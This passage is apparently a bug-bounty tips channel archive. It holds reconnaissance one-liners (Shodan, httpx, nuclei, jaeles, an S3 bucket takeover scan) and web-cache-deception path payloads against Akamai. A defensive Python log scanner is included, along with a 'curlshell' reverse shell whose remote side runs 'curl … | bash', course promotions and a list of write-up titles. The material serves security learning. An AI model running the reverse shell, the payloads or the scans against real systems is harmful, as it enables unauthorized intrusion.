Bug bounty Tips


🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️‍♂️ OSINT Specialist Admin: @laazy_hack3r

Post archive
Hey! After a long break, I am back with some BugBounty notes on reconnaissance, with the list of tools and their techniques. https://book.cipherops.tech/bug-bounty-notes/series-on-the-power-of-reconnaissance-tools

Don't ignore WordPress websites :) Payload:

Fingerprinting with Shodan and Nuclei engine:
> shodan domain tesla.com | awk '{print $3}' | httpx -silent | nuclei
> shodan domain tesla.com | awk '{print $3}' | httpx -silent | anew | xargs -I@ jaeles scan -c 100 -s /jaeles-signatures/ -u @
> shodan search org:"google" --fields ip_str,port --separator " " | awk '{print $1":"$2}'
#bugbounty #bugbountytips

Repost from #bugbountytips
Sometimes, if the response is "404 Not Found", Akamai caches the response for less than 10 seconds, which makes the task harder. In that case the attacker has to be fast. However, if Akamai sees a 200 OK response, it will be stored for at least 24 hours. Tip: In some applications, adding a semicolon (;) before the extension may give you a 200 OK response. For example:
/xxxx/xxxxxx/;.js?test
/xxxx/xxxxxx/;.css?test

or (bypassing a 403 when trying to cache)
/xxxx/xxxxxx/;%2ejs?test
/xxxx/xxxxxx/;%2ecss?test

We get HTTP/2 200 OK and the response is stored in the cache for 24 hours.
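
From the defender's side, the request shape described in the post above (a final path segment made of a semicolon plus a static extension, with the dot literal or %2e-encoded) can be searched for in origin access logs. This is an added example, not part of the original post; the combined log format, the extension list and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Static extensions a CDN commonly caches by default (assumed list, adjust to your config).
STATIC_EXT = ("js", "css", "png", "jpg", "gif", "ico", "svg", "woff2")

# Request line and status in combined log format: "GET /path HTTP/1.1" 200
LINE_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

# Final path segment that is only ";" + "." + static extension, e.g. "/;.js"
SUSPECT_RE = re.compile(r"/;\.(?:%s)$" % "|".join(STATIC_EXT), re.IGNORECASE)


def suspicious_requests(lines):
    """Return (raw_path, status, encoded_dot) for requests ending in ';.ext'."""
    hits = []
    for line in lines:
        m = LINE_RE.search(line)
        if not m:
            continue
        raw_path = m.group("target").split("?", 1)[0]  # drop the query string
        decoded = unquote(raw_path)                     # so ';%2ejs' becomes ';.js'
        if SUSPECT_RE.search(decoded):
            encoded_dot = "%2e" in raw_path.lower()
            hits.append((raw_path, int(m.group("status")), encoded_dot))
    return hits


def cacheable_hits(lines):
    """Subset answered with 200, the case the post says is kept for at least 24 hours."""
    return [h for h in suspicious_requests(lines) if h[1] == 200]


# Constructed sample log lines (documentation IP ranges, made-up paths).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /account/profile/;.js?test HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jan/2024:10:00:02 +0000] "GET /account/profile/;%2ecss?test HTTP/1.1" 200 5120',
    '198.51.100.4 - - [01/Jan/2024:10:00:05 +0000] "GET /static/app.js HTTP/1.1" 200 900',
    '198.51.100.9 - - [01/Jan/2024:10:00:09 +0000] "GET /missing/;.js HTTP/1.1" 404 120',
]

if __name__ == "__main__":
    for path, status, enc in suspicious_requests(SAMPLE_LOG):
        print(status, path, "(encoded dot)" if enc else "")
```

Hits with status 200 on paths that normally return dynamic or per-user content are the ones to review first, together with the cache rules that match on file extension.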

curlshell
reverse shell using curl
Usage:
Start your listener:
./curlshell.py --certificate fullchain.pem --private-key privkey.pem --listen-port 1234
On the remote side:
curl https://curlshell:1234 | bash
#shell #curl

Owasp Top 10 Vulnerabilities.pdf (2.30 MB)

#bugbountytips
Scan for s3 bucket takeover vulnerabilities
> subfinder -d hackerone.com -silent | httpx -silent | gospider -d 5 --sitemap --robots -w -r --subs | grep "\[aws-s3" | sed 's/\[aws-s3\] - //g' | httpx -silent -mr "NoSuchBucket" | tee s3-bucket-takeover.txt

#bugbountytips
1. Finding More IDORs – Tips And Tricks ($100/Day)
2. How-i-found-XSS-on-admin-page-without-login?
3. Reconnaissance to Remote Code Execution
4. How I get +10 SQLi and +30 XSS via Automation Tool?
5. IDOR is Everywhere 😁
6. $300 for Reporting an Unexpected Bug
7. How I hacked one of the biggest airlines group in the world?
8. International company customer PII INFO by AWS metadata access through SSRF
9. I Earned $3500 and 40 Points for A GraphQL Blind SQL Injection
10. I got owned a Multi-Billion Dollar Retailer’s MySQL using SQL Injection


Guys, check out this training and internship program. If anyone is interested, do register at the link below. https://forms.gle/vr77U7P5REZdDPB37

Check this out, guys: we have updated our training and internship program on our official website. ➡️Cipherops.tech

If anyone is interested in joining the webinar, do join at 6 PM sharp. Webinar link for “unlocking the secrets of Bug Bounty”: meet.google.com/rbp-bwsh-mbb